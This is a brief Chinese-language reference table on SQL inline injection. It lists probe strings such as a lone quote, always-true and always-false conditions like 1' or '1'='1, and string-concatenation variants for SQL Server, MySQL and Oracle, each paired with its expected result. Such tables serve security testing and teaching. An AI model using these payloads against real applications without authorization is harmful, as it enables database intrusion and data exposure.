sql内联注入
测试字符串 |
变 种 |
预 期 结 果 |
' |
|
触发错误。如果成功,数据库将返回一个错误 |
1' or '1'='1 |
1') or ('1'='1 |
永真条件。如果成功,将返回表中所有的行 |
value' or '1'='2 |
value') or ('1'='2 |
空条件。如果成功,将返回与原来的值相同的结果 |
1' and '1'='2 |
1') and ('1'='2 |
永假条件。如果成功,将不返回表中任何行 |
1' or 'ab'='a'+'b |
1') or ('ab'='a'+'b |
SQL Server字符串连接。如果成功, 将返回与永真条件相同的信息 |
1' or 'ab'='a' 'b |
1') or ('ab'='a' 'b |
MySQL字符串连接。如果成功,将返 回与永真条件相同的信息 |
1' or 'ab'='a'‖'b |
1') or ('ab'='a'‖'b |
Oracle字符串连接。如果成功,将返回与永真条件相同的信息 |